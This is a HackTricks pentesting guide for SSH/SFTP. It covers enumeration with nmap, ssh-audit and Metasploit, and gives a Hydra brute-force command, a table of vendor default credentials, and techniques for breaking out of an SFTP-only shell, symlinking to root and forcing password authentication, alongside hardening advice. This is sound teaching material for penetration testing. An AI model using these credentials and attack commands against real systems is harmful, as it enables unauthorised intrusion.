hacktricks/pentesting/pentesting-ssh.md
Spraten bf113b9689
consoleless mfs enumeration
Description: SSH enumeration without the need to run msfconsole
  	Note: sourced from https://github.com/carlospolop/legion
2021-10-27 12:00:25 -04:00

297 lines
13 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 22 - Pentesting SSH/SFTP
## Basic Information
**SSH or Secure Shell or Secure Socket Shell,** is a network protocol that gives users a **secure way to access a computer over an unsecured network.**
**Default port:** 22
```text
22/tcp open ssh syn-ack
```
**SSH servers:**
* [openSSH](http://www.openssh.org/) OpenBSD SSH, shipped in BSD, Linux distributions and Windows since Windows 10
* [Dropbear](https://matt.ucc.asn.au/dropbear/dropbear.html) SSH implementation for environments with low memory and processor resources, shipped in OpenWrt
* [PuTTY](https://www.chiark.greenend.org.uk/~sgtatham/putty/) SSH implementation for Windows, the client is commonly used but the use of the server is rarer
* [CopSSH](https://www.itefix.net/copssh) implementation of OpenSSH for Windows
**SSH libraries \(implementing server-side\):**
* [libssh](https://www.libssh.org/) multiplatform C library implementing the SSHv2 protocol with bindings in [Python](https://github.com/ParallelSSH/ssh-python), [Perl](https://github.com/garnier-quentin/perl-libssh/) and [R](https://github.com/ropensci/ssh); its used by KDE for sftp and by GitHub for the git SSH infrastructure
* [wolfSSH](https://www.wolfssl.com/products/wolfssh/) SSHv2 server library written in ANSI C and targeted for embedded, RTOS, and resource-constrained environments
* [Apache MINA SSHD](https://mina.apache.org/sshd-project/index.html) Apache SSHD java library is based on Apache MINA
* [paramiko](https://github.com/paramiko/paramiko) Python SSHv2 protocol library
## Enumeration
### Banner Grabbing
```bash
nc -vn <IP> 22
```
### Automated ssh-audit
ssh-audit is a tool for ssh server & client configuration auditing.
[https://github.com/jtesta/ssh-audit](https://github.com/jtesta/ssh-audit) is an updated fork from [https://github.com/arthepsy/ssh-audit/](https://github.com/arthepsy/ssh-audit/)
**Features:**
* SSH1 and SSH2 protocol server support;
* analyze SSH client configuration;
* grab banner, recognize device or software and operating system, detect compression;
* gather key-exchange, host-key, encryption and message authentication code algorithms;
* output algorithm information \(available since, removed/disabled, unsafe/weak/legacy, etc\);
* output algorithm recommendations \(append or remove based on recognized software version\);
* output security information \(related issues, assigned CVE list, etc\);
* analyze SSH version compatibility based on algorithm information;
* historical information from OpenSSH, Dropbear SSH and libssh;
* runs on Linux and Windows;
* no dependencies
```bash
usage: ssh-audit.py [-1246pbcnjvlt] <host>
-1, --ssh1 force ssh version 1 only
-2, --ssh2 force ssh version 2 only
-4, --ipv4 enable IPv4 (order of precedence)
-6, --ipv6 enable IPv6 (order of precedence)
-p, --port=<port> port to connect
-b, --batch batch output
-c, --client-audit starts a server on port 2222 to audit client
software config (use -p to change port;
use -t to change timeout)
-n, --no-colors disable colors
-j, --json JSON output
-v, --verbose verbose output
-l, --level=<level> minimum output level (info|warn|fail)
-t, --timeout=<secs> timeout (in seconds) for connection and reading
(default: 5)
$ python3 ssh-audit <IP>
```
[See it in action \(Asciinema\)](https://asciinema.org/a/96ejZKxpbuupTK9j7h8BdClzp)
### Public SSH key of server
```bash
ssh-keyscan -t rsa <IP> -p <PORT>
```
### Weak Cipher Algorithms
This is discovered by default by **nmap**. But you can also use **sslcan** or **sslyze**.
### Nmap scripts
```bash
nmap -p22 <ip> -sC # Send default nmap scripts for SSH
nmap -p22 <ip> -sV # Retrieve version
nmap -p22 <ip> --script ssh2-enum-algos # Retrieve supported algorythms
nmap -p22 <ip> --script ssh-hostkey --script-args ssh_hostkey=full # Retrieve weak keys
nmap -p22 <ip> --script ssh-auth-methods --script-args="ssh.user=root" # Check authentication methods
```
### Shodan
* `ssh`
## Brute force usernames, passwords and private keys
### Username Enumeration
In some versions of OpenSSH you can make a timing attack to enumerate users. You can use a metasploit module in order to exploit this:
```text
msf> use scanner/ssh/ssh_enumusers
```
### [Brute force](../brute-force.md#ssh)
Some common ssh credentials [here ](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt)and [here](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt) and below.
### Private/Public Keys BF
If you know some ssh private key that could be used... lets try it. You can use the nmap script:
```text
https://nmap.org/nsedoc/scripts/ssh-publickey-acceptance.html
```
Or the MSF auxiliary module:
```text
msf> use scanner/ssh/ssh_identify_pubkeys
```
#### Known badkeys can be found here:
{% embed url="https://github.com/rapid7/ssh-badkeys/tree/master/authorized" caption="" %}
You should look here in order to search for valid keys for the victim machine.
### Kerberos
**crackmapexec** using the `ssh` protocol can use the option `--kerberos` to **authenticate via kerberos**.
For more info run `crackmapexec ssh --help`.
## Default Credentials
| **Vendor** | **Usernames** | **Passwords** |
| :--- | :--- | :--- |
| APC | apc, device | apc |
| Brocade | admin | admin123, password, brocade, fibranne |
| Cisco | admin, cisco, enable, hsa, pix, pnadmin, ripeop, root, shelladmin | admin, Admin123, default, password, secur4u, cisco, Cisco, \_Cisco, cisco123, C1sco!23, Cisco123, Cisco1234, TANDBERG, change\_it, 12345, ipics, pnadmin, diamond, hsadb, c, cc, attack, blender, changeme |
| Citrix | root, nsroot, nsmaint, vdiadmin, kvm, cli, admin | C1trix321, nsroot, nsmaint, kaviza, kaviza123, freebsd, public, rootadmin, wanscaler |
| D-Link | admin, user | private, admin, user |
| Dell | root, user1, admin, vkernel, cli | calvin, 123456, password, vkernel, Stor@ge!, admin |
| EMC | admin, root, sysadmin | EMCPMAdm7n, Password\#1, Password123\#, sysadmin, changeme, emc |
| HP/3Com | admin, root, vcx, app, spvar, manage, hpsupport, opc\_op | admin, password, hpinvent, iMC123, pvadmin, passw0rd, besgroup, vcx, nice, access, config, 3V@rpar, 3V\#rpar, procurve, badg3r5, OpC\_op, !manage, !admin |
| Huawei | admin, root | 123456, admin, root, Admin123, Admin@storage, Huawei12\#$, HwDec@01, hwosta2.0, HuaWei123, fsp200@HW, huawei123 |
| IBM | USERID, admin, manager, mqm, db2inst1, db2fenc1, dausr1, db2admin, iadmin, system, device, ufmcli, customer | PASSW0RD, passw0rd, admin, password, Passw8rd, iadmin, apc, 123456, cust0mer |
| Juniper | netscreen | netscreen |
| NetApp | admin | netapp123 |
| Oracle | root, oracle, oravis, applvis, ilom-admin, ilom-operator, nm2user | changeme, ilom-admin, ilom-operator, welcome1, oracle |
| VMware | vi-admin, root, hqadmin, vmware, admin | vmware, vmw@re, hqadmin, default |
## Config Misconfigurations
### Root login
By default most SSH server implementation will allow root login, it is advised to disable it because if the credentials of this accounts leaks, attackers will get administrative privileges directly and this will also allow attackers to conduct bruteforce attacks on this account.
**How to disable root login for openSSH:**
1. Edit SSH server configuration `sudoedit /etc/ssh/sshd_config`
2. Change `#PermitRootLogin yes` into `PermitRootLogin no`
3. Take into account configuration changes: `sudo systemctl daemon-reload`
4. Restart the SSH server `sudo systemctl restart sshd`
### SFTP command execution
Another common SSH misconfiguration is often seen in SFTP configuration. Most of the time when creating a SFTP server the administrator want users to have a SFTP access to share files but not to get a remote shell on the machine. So they think that creating a user, attributing him a placeholder shell \(like `/usr/bin/nologin` or `/usr/bin/false`\) and chrooting him in a jail is enough to avoid a shell access or abuse on the whole file system. But they are wrong, **a user can ask to execute a command right after authentication before its default command or shell is executed**. So to bypass the placeholder shell that will deny shell access, one only has to ask to execute a command \(eg. `/bin/bash`\) before, just by doing:
```text
$ ssh -v noraj@192.168.1.94 id
...
Password:
debug1: Authentication succeeded (keyboard-interactive).
Authenticated to 192.168.1.94 ([192.168.1.94]:22).
debug1: channel 0: new [client-session]
debug1: Requesting no-more-sessions@openssh.com
debug1: Entering interactive session.
debug1: pledge: network
debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0
debug1: Sending command: id
debug1: client_input_channel_req: channel 0 rtype exit-status reply 0
debug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0
uid=1000(noraj) gid=100(users) groups=100(users)
debug1: channel 0: free: client-session, nchannels 1
Transferred: sent 2412, received 2480 bytes, in 0.1 seconds
Bytes per second: sent 43133.4, received 44349.5
debug1: Exit status 0
$ ssh noraj@192.168.1.94 /bin/bash
```
Here is an example of secure SFTP configuration \(`/etc/ssh/sshd_config` openSSH\) for the user `noraj`:
```text
Match User noraj
ChrootDirectory %h
ForceCommand internal-sftp
AllowTcpForwarding no
PermitTunnel no
X11Forwarding no
PermitTTY no
```
This configuration will allow only SFTP: disabling shell access by forcing the start command and disabling TTY access but also disabling all kind of port forwarding or tunneling.
### SFTP Tunneling
If you have access to a SFTP server you can also tunnel your traffic through this for example using the common port forwarding:
```text
sudo ssh -L <local_port>:<remote_host>:<remote_port> -N -f <username>@<ip_compromised>
```
### SFTP Symlink
The **sftp** have the command "**symlink**". Therefor, if you have **writable rights** in some folder, you can create **symlinks** of **other folders/files**. As you are probably **trapped** inside a chroot this **won't be specially useful** for you, but, if you can **access** the created **symlink** from a **no-chroot** **service** \(for example, if you can access the symlink from the web\), you could **open the symlinked files through the web**.
For example, to create a **symlink** from a new file **"**_**froot**_**" to "**_**/**_**"**:
```text
sftp> symlink / froot
```
If you can access the file "_froot_" via web, you will be able to list the root \("/"\) folder of the system.
### Authentication methods
On high security environment its a common practice to enable only key-based or two factor authentication rather than the simple factor password based authentication. But often the stronger authentication methods are enabled without disabling the weaker ones. A frequent case is enabling `publickey` on openSSH configuration and setting it as the default method but not disabling `password`. So by using the verbose mode of the SSH client an attacker can see that a weaker method is enabled:
```text
$ ssh -v 192.168.1.94
OpenSSH_8.1p1, OpenSSL 1.1.1d 10 Sep 2019
...
debug1: Authentications that can continue: publickey,password,keyboard-interactive
```
For example if an authentication failure limit is set and you never get the chance to reach the password method, you can use the `PreferredAuthentications` option to force to use this method.
```text
$ ssh -v 192.168.1.94 -o PreferredAuthentications=password
...
debug1: Next authentication method: password
```
Review the SSH server configuration is necessary to check that only expected
methods are authorized. Using the verbose mode on the client can help to see
the effectiveness of the configuration.
### Config files
```text
ssh_config
sshd_config
authorized_keys
ssh_known_hosts
known_hosts
id_rsa
```
## Fuzzing
* [https://packetstormsecurity.com/files/download/71252/sshfuzz.txt](https://packetstormsecurity.com/files/download/71252/sshfuzz.txt)
* [https://www.rapid7.com/db/modules/auxiliary/fuzzers/ssh/ssh\_version\_2](https://www.rapid7.com/db/modules/auxiliary/fuzzers/ssh/ssh_version_2)
## References
* You can find interesting guides on how to harden SSH in [https://www.ssh-audit.com/hardening\_guides.html](https://www.ssh-audit.com/hardening_guides.html)
* [https://community.turgensec.com/ssh-hacking-guide](https://community.turgensec.com/ssh-hacking-guide)
## HackTricks Automatic Commands
```text
Protocol_Name: SSH
Port_Number: 22
Protocol_Description: Secure Shell Hardening
Entry_1:
Name: Hydra Brute Force
Description: Need Username
Command: hydra -v -V -u -l {Username} -P {Big_Passwordlist} -t 1 -u {IP} ssh
Entry_2:
Name: consolesless mfs enumeration
Description: SSH enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/ssh/ssh_version; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use scanner/ssh/ssh_enumusers; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ssh/juniper_backdoor; set RHOSTS {IP}; set RPORT 22; run; exit'
```